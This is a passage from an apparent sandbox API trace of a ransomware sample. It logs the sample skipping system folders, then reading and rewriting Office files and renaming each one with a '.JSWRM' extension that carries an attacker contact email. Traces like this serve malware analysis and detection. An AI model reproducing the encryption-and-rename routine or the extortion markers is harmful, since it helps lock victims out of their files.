WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTE.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTE.CFG", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NOTE.CFG", lpUsedDefaultChar=0x0) returned 8 [0129.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\note.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.952] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=781) returned 1 [0129.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.952] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0129.954] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.954] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0129.954] CloseHandle (hObject=0x314) returned 1 [0129.954] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\note.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTE.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\note.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.955] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="NOTEL.ICO", cAlternateFileName="")) returned 1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2=".") returned 1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="..") returned 1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="...") returned 1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="windows") returned -1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="recovery") returned -1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="perflogs") returned -1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="documents and settings") returned 1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="system volume information") returned -1 [0129.955] lstrcmpiW (lpString1="NOTEL.ICO", lpString2="msocache") returned 1 [0129.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTEL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTEL.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NOTEL.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTEL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTEL.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NOTEL.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\notel.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.957] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.957] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.957] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.959] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.959] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.959] CloseHandle (hObject=0x314) returned 1 [0129.959] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\notel.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTEL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\notel.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.960] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="NOTES.ICO", cAlternateFileName="")) returned 1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2=".") returned 1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2="..") returned 1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2="...") returned 1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2="windows") returned -1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2="recovery") returned -1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2="perflogs") returned -1 [0129.960] lstrcmpiW (lpString1="NOTES.ICO", lpString2="documents and settings") returned 1 [0129.961] lstrcmpiW (lpString1="NOTES.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.961] lstrcmpiW (lpString1="NOTES.ICO", lpString2="system volume information") returned -1 [0129.961] lstrcmpiW (lpString1="NOTES.ICO", lpString2="msocache") returned 1 [0129.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTES.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTES.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NOTES.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTES.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTES.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NOTES.ICO", lpUsedDefaultChar=0x0) returned 9 [0129.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\notes.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.962] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.962] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.962] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.964] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.964] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.964] CloseHandle (hObject=0x314) returned 1 [0129.964] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\notes.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\NOTES.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\notes.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.965] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x267, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="OMSMMS.CFG", cAlternateFileName="")) returned 1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2=".") returned 1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="..") returned 1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="...") returned 1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="windows") returned -1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="recovery") returned -1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="perflogs") returned -1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="documents and settings") returned 1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="system volume information") returned -1 [0129.966] lstrcmpiW (lpString1="OMSMMS.CFG", lpString2="msocache") returned 1 [0129.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMMS.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMMS.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSMMS.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMMS.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSMMS.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSMMS.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\omsmms.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.967] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=615) returned 1 [0129.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.968] ReadFile (in: hFile=0x314, lpBuffer=0x207860, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345e534*=0x260, lpOverlapped=0x0) returned 1 [0129.969] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.969] WriteFile (in: hFile=0x314, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345e530*=0x260, lpOverlapped=0x0) returned 1 [0129.969] CloseHandle (hObject=0x314) returned 1 [0129.970] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\omsmms.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OMSMMS.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\omsmms.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.971] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25b, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="OMSSMS.CFG", cAlternateFileName="")) returned 1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2=".") returned 1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="..") returned 1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="...") returned 1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="windows") returned -1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="recovery") returned -1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="perflogs") returned -1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="documents and settings") returned 1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="system volume information") returned -1 [0129.971] lstrcmpiW (lpString1="OMSSMS.CFG", lpString2="msocache") returned 1 [0129.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSSMS.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSSMS.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSSMS.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSSMS.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSSMS.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSSMS.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\omssms.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.972] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=603) returned 1 [0129.972] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.972] ReadFile (in: hFile=0x314, lpBuffer=0x207860, nNumberOfBytesToRead=0x250, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345e534*=0x250, lpOverlapped=0x0) returned 1 [0129.973] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.973] WriteFile (in: hFile=0x314, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345e530*=0x250, lpOverlapped=0x0) returned 1 [0129.973] CloseHandle (hObject=0x314) returned 1 [0129.973] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\omssms.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OMSSMS.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\omssms.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.975] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="OOFL.ICO", cAlternateFileName="")) returned 1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2=".") returned 1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="..") returned 1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="...") returned 1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="windows") returned -1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="recovery") returned -1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="perflogs") returned -1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="documents and settings") returned 1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="system volume information") returned -1 [0129.975] lstrcmpiW (lpString1="OOFL.ICO", lpString2="msocache") returned 1 [0129.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFL.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OOFL.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OOFL.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OOFL.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\oofl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.976] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.976] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.976] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, 